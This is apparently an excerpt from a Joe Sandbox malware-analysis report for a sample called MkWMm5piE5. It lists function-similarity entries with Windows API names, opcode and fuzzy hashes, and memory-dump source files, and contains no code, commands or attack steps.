                                                                                                                                                                                                                                                                          • API ID: strncmp
                                                                                                                                                                                                                                                                          • String ID: CJK UNIFIED IDEOGRAPH-$HANGUL SYLLABLE
                                                                                                                                                                                                                                                                          • API String ID: 1114863663-87138338
                                                                                                                                                                                                                                                                          • Opcode ID: 2595fa2025d07ddf98b647c638fd1ed7edd11107ba76c08aad6fbc153bf9cbc4
                                                                                                                                                                                                                                                                          • Instruction ID: a4a055a0ec1292d5f6688ceab21735636c6c8bb283d45e5f356dc7fd478e1aef
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2595fa2025d07ddf98b647c638fd1ed7edd11107ba76c08aad6fbc153bf9cbc4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8261D472B5864246E665CA1DAC0067EB292EB90BE0F484237EA5D47EE9DF3DE4438700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596106431.00007FFEDCBA1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFEDCBA0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596079579.00007FFEDCBA0000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596229944.00007FFEDCCCC000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596266920.00007FFEDCCFA000.00000004.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596342688.00007FFEDCCFF000.00000002.00000001.01000000.0000001B.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedcba0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: memset
                                                                                                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$2d3a40c05c49e1a49264912b1a05bc2143ac0e7c3df588276ce80a4cbc9bd1b0$database corruption
                                                                                                                                                                                                                                                                          • API String ID: 2221118986-3418467682
                                                                                                                                                                                                                                                                          • Opcode ID: a59836951526b2add0dae058d111b5bc160af8710fac0e987abcc3119e3b6a5b
                                                                                                                                                                                                                                                                          • Instruction ID: d3164389fe640a97ac30a15e6a760ade295421af6ca0fc23680d337b8e92b888
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a59836951526b2add0dae058d111b5bc160af8710fac0e987abcc3119e3b6a5b
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E41A522A59B5582EB608F19E4402BE73A5FB84BC0F591936FB8D57BA4DF3CD502CB40
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Dealloc$BoolCompareObject_Rich
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 74976934-0
                                                                                                                                                                                                                                                                          • Opcode ID: 06e8f97dbb0ea0e89ed53f8803494b3fcf86a5d1c840b79286c23275ed2a61a7
                                                                                                                                                                                                                                                                          • Instruction ID: 17e27fa600b15124949b9c066651f67896d52e385c760a38009320cba9d37188
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 06e8f97dbb0ea0e89ed53f8803494b3fcf86a5d1c840b79286c23275ed2a61a7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5116632A1854285E7748B25E54477C2390AF55BB8F0C1332DA7A47AF5EF6EE8648700
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598074345.00007FFEDD965000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598093889.00007FFEDD96B000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598111668.00007FFEDD96F000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd950000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Dealloc
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3617616757-0
                                                                                                                                                                                                                                                                          • Opcode ID: ece71df874b8b5f5a56a715ca088fb7d08a9acaf02b1d109a510bd9dd73bf957
                                                                                                                                                                                                                                                                          • Instruction ID: 088920ee7c6453dd8bffe8d9d4b9b81a9e1baeacc88c88034291af03a18926f1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ece71df874b8b5f5a56a715ca088fb7d08a9acaf02b1d109a510bd9dd73bf957
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB21CA7690960181EBB99F34D45837C22A8EB55B3DF281332CA7D429F0AFBFA485C750
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2595435584.00007FFEDC531000.00000020.00000001.01000000.0000001F.sdmp, Offset: 00007FFEDC530000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2595418293.00007FFEDC530000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2595739361.00007FFEDCA03000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2595840578.00007FFEDCB43000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2595860412.00007FFEDCB47000.00000008.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2595978756.00007FFEDCB52000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596002703.00007FFEDCB54000.00000004.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596028487.00007FFEDCB55000.00000002.00000001.01000000.0000001F.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedc530000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                          • Opcode ID: ff4f3edb73ccb2b5a921599c578c821157fd68db91dd4b7440eb1c091a05e9ad
                                                                                                                                                                                                                                                                          • Instruction ID: 6418cc921cd9353ea048ac9a2a804f6cebddeaf4c38ca4c7b50921eb3351d0e0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ff4f3edb73ccb2b5a921599c578c821157fd68db91dd4b7440eb1c091a05e9ad
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0112E26B56F0189EB50CF64E8542BC33A4F719798F481E32DA6D46BB8DF78E1558340
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2594249532.00007FFEDC461000.00000020.00000001.01000000.00000031.sdmp, Offset: 00007FFEDC460000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2594232558.00007FFEDC460000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2594266457.00007FFEDC463000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2594284786.00007FFEDC464000.00000004.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2594301723.00007FFEDC465000.00000002.00000001.01000000.00000031.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedc460000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                          • Opcode ID: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                                                                          • Instruction ID: 1fe9a0b819b40cadd91612a399dc4876a62ec0a8554955160e27a1ce9a034add
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E111F22B94F4189EB00CF64E8542BC33B4F719B9CF481D32DA5D46B68DF78D1598340
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2594335929.00007FFEDC471000.00000020.00000001.01000000.00000030.sdmp, Offset: 00007FFEDC470000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2594319189.00007FFEDC470000.00000002.00000001.01000000.00000030.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2594352980.00007FFEDC476000.00000002.00000001.01000000.00000030.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2594370437.00007FFEDC47B000.00000002.00000001.01000000.00000030.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedc470000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                          • Opcode ID: 1180e2e5db8fc01fcffb0ed67e503fd1d649ff95b0bf32135d6d632c2e4928ca
                                                                                                                                                                                                                                                                          • Instruction ID: 69980f388fecee539c3c663711e8aa80dad3215d175096a549f99b6f98f82ea4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1180e2e5db8fc01fcffb0ed67e503fd1d649ff95b0bf32135d6d632c2e4928ca
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06111C22B55B4189EB00CF64E8582BD33B4F7197ACF481D32DA6D46BA4DF78D1998380
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2596454709.00007FFEDCD11000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FFEDCD10000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596428975.00007FFEDCD10000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCD15000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCD72000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDBE000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDC2000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCDC7000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596478009.00007FFEDCE1F000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596634280.00007FFEDCE22000.00000004.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2596649822.00007FFEDCE24000.00000002.00000001.01000000.00000019.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedcd10000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                          • Opcode ID: 72bede81ece5e2e392027b9a3fb7c5a8727f1bec05a0bf030ff1659b91ba639d
                                                                                                                                                                                                                                                                          • Instruction ID: c2e48225be10c95ff0c615544e15340efd9acb299618a088823986d3f09a0856
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72bede81ece5e2e392027b9a3fb7c5a8727f1bec05a0bf030ff1659b91ba639d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19111F26B54F0189EB00CB64EC542BC73A4F719798F880932DE5D46BA4DF7CD1598340
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2595351550.00007FFEDC521000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FFEDC520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2595335236.00007FFEDC520000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2595367842.00007FFEDC523000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2595384572.00007FFEDC524000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2595400480.00007FFEDC525000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedc520000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                          • Opcode ID: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                                                                          • Instruction ID: b7c487ed911d9ea282a5b9680c758848a393b8d17f73750f69f7cdf0175eb2f4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B113022B54F0589EB00CFA4E9542BDB3E4F719798F481D32DA6D46BA4DF7CD1998340
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2597968874.00007FFEDD941000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFEDD940000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2597953530.00007FFEDD940000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2597989165.00007FFEDD943000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598005826.00007FFEDD944000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598022224.00007FFEDD945000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd940000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                          • Opcode ID: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                                                                          • Instruction ID: 52ec888ff4bb36a1d69d1ddf9953b950a0ee5808bf4bded99e60c89bee3cd404
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54110D22B54F4589EB20CF60E8542BC33A4F71975CF480E32DA5D46B75EFB9D1588240
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2594679250.00007FFEDC491000.00000020.00000001.01000000.0000002E.sdmp, Offset: 00007FFEDC490000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2594658775.00007FFEDC490000.00000002.00000001.01000000.0000002E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2594696648.00007FFEDC493000.00000002.00000001.01000000.0000002E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2594713419.00007FFEDC495000.00000002.00000001.01000000.0000002E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedc490000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                          • Opcode ID: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                                                                          • Instruction ID: d72967acdc64f7261f156c282276c2e108124149d0fee8859a6d5b97a6d8014e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67114C22B54F1189EB108B64E8552BC33B4F71979CF081D36DA6D42BA8DF38D1A98340
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2594748658.00007FFEDC4A1000.00000020.00000001.01000000.0000002D.sdmp, Offset: 00007FFEDC4A0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2594731365.00007FFEDC4A0000.00000002.00000001.01000000.0000002D.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2594766207.00007FFEDC4A3000.00000002.00000001.01000000.0000002D.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2594790618.00007FFEDC4A5000.00000002.00000001.01000000.0000002D.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedc4a0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                          • Opcode ID: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                                                                          • Instruction ID: 09a93041056cc7b63e45c7d1833f3a00e9fa2b768edae4b4aa114114bbb0ce43
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72111F22B58F1189EB008B65E8542BD33B4F75979CF482D32DA6D86B64DF78D1598340
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2595132616.00007FFEDC4F1000.00000020.00000001.01000000.00000028.sdmp, Offset: 00007FFEDC4F0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2595116382.00007FFEDC4F0000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2595148849.00007FFEDC4F4000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2595165281.00007FFEDC4F5000.00000004.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2595180075.00007FFEDC4F6000.00000002.00000001.01000000.00000028.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedc4f0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                          • Opcode ID: 493cd77a90e5c295e0a13832c877ca8242a8c7c6650e20918972179ee45c67e9
                                                                                                                                                                                                                                                                          • Instruction ID: 75a732ddb291dc62a76e6fdf5db5576330ef7e682869bd0dccdd83a0359f7382
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 493cd77a90e5c295e0a13832c877ca8242a8c7c6650e20918972179ee45c67e9
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87111C26B54B0189EB008B64E8542BD33B4FB1D79DF481D32DA6D46BA4DF78D1998340
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2594827927.00007FFEDC4B1000.00000020.00000001.01000000.0000002C.sdmp, Offset: 00007FFEDC4B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2594809510.00007FFEDC4B0000.00000002.00000001.01000000.0000002C.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2594844860.00007FFEDC4B2000.00000002.00000001.01000000.0000002C.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2594861714.00007FFEDC4B4000.00000002.00000001.01000000.0000002C.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedc4b0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                          • Opcode ID: 0baeea097dfd391caeb23ce1cd709dc375e05fd8cc26cab7f33f9427a773fc6d
                                                                                                                                                                                                                                                                          • Instruction ID: cbdda3e68a9135b3c5b4b68d2345707dfd5d6649e95d549ca674ca93934ca6b8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0baeea097dfd391caeb23ce1cd709dc375e05fd8cc26cab7f33f9427a773fc6d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6111C22B58F0589EB008F65E8542BC33B5FB1979CF481D32DB6D86BA4DF78D19A8340
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2594980319.00007FFEDC4D1000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00007FFEDC4D0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2594964767.00007FFEDC4D0000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2594996513.00007FFEDC4D3000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2595012766.00007FFEDC4D5000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedc4d0000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                          • Opcode ID: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                                                                          • Instruction ID: c820e33584fb9b4eeeb737c0a7c1c8161b9de5cd91bbdf513f47605323b8c662
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 71111C22B54F0189EB009B64E8542BC33B4F71979CF482D32DA6D46BA8DF7CD1998340
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2597905491.00007FFEDD931000.00000020.00000001.01000000.00000024.sdmp, Offset: 00007FFEDD930000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2597888364.00007FFEDD930000.00000002.00000001.01000000.00000024.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2597921553.00007FFEDD933000.00000002.00000001.01000000.00000024.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2597937367.00007FFEDD935000.00000002.00000001.01000000.00000024.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_7ffedd930000_MkWMm5piE5.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2933794660-0
                                                                                                                                                                                                                                                                          • Opcode ID: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                                                                          • Instruction ID: 52258666cf371fbe64d1af7c4e99d445461f3a38fc6f753d5bd7d846246427d3
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57e55c07fb4b7e3f2d380650e9b8758557fae20b4aa4a558b4cbdb1162b5ee6f
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB112E22B54F0189EB10CF64E8542BD33A4F719758F480D32DA6D46BB4EFBDD1988340
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2598055214.00007FFEDD951000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FFEDD950000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2598039044.00007FFEDD950000.00000002.00000001.01000000.00000018.sdmpDownload File
